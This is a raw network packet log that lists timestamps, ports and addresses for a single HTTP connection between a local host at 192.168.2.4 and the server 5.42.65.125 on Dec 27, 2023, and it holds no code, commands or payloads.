Dec 27, 2023 17:57:26.270637035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270642996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270653009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270667076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270672083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270682096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270685911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270697117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270709991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270721912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270723104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270735979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270740986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270750046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270764112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270778894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270781994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270793915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270806074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270807981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270829916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.323793888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343481064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343529940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343543053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343550920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343566895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343580961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343592882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343605042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343616962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343630075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343641043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343677044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343682051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343697071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343712091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343728065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343728065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343743086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343750000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343755960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343763113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343770981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343785048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343791008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343800068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343813896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343823910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343827963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343842030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343842030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343856096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343868971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343879938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343883038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343897104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343909979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343934059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.343971014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343985081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.343997955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344012976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344024897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344026089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344039917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344053030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344053984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344065905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344073057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344086885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344096899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344101906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344116926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344122887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344131947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344146967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344158888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344161987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344172001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344187975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344189882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344202995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344212055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344219923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344232082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344244957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344247103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344264984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344269037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344280005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344295025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344301939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344309092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344322920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344333887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344335079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344350100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344377995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344400883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344691992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344707012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344748974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344757080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344763994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344777107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344810963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344822884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344836950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344857931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344871044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344871998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344894886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.344935894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344950914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344965935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344979048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.344995022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345000982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345009089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345026970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345041990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345045090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345061064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345073938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345087051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345101118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345103979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345114946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345127106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345130920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345139980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345149994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345172882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345526934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345541954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345555067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345567942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345573902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345592022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345618963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345758915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345774889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345788002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345799923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345799923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345813036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345827103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345829964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345839977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345851898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345854998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345869064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345881939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345882893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345896006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345901966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345911980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345920086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345926046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345940113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345949888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.345953941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345968962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345982075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345995903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.345995903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346010923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346019030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346025944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346039057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346043110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346051931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346069098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346106052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346502066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346548080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346563101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346590996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346600056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346606016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346618891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346643925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346648932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346657991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346671104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346684933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346707106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346719027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346730947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346734047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346751928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346765041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346765041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346781015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346795082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346808910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346811056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346822023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346834898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346839905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346853971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346868992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346869946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346883059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346896887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.346896887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.346923113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347291946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347306967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347318888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347342014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347356081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347356081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347371101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347395897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347441912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347456932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347467899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347481966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347491980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347496033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347511053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347521067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347524881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347537994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347551107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347553968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347565889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347567081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347580910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347593069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347594976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347608089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347620010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347631931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347668886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347687960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347702026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347714901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347728014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347743988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347758055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347759008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347771883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.347784996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347784996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.347821951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348237991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348253965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348297119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348299980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348325014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348340034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348354101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348378897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348406076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348442078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348541021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348553896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348566055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348578930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348591089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348608017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348613024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348624945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348664045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348664045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348707914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348715067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348737001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348778009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348792076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348804951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348824978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348849058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348911047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348926067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348938942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348953009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.348961115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.348985910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349059105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349073887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349086046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349100113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349119902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349132061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349134922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349179983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349186897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349201918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349214077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349227905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349240065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349241972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349253893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349263906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349267006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349291086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349351883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349368095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349380970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349395037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349425077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349431992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349436045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349447012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349459887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349473953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349489927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349509001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349520922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349534988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349548101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349581003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349606037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349741936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349756002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349767923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349781990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349795103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349827051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.349961042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.349975109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350006104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350013971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350027084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350052118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350064993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350071907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350106001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350106955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350120068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350132942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350152016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350287914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350302935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350315094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350327969 CET	80	49738	5.42.65.125	192.168.2.4
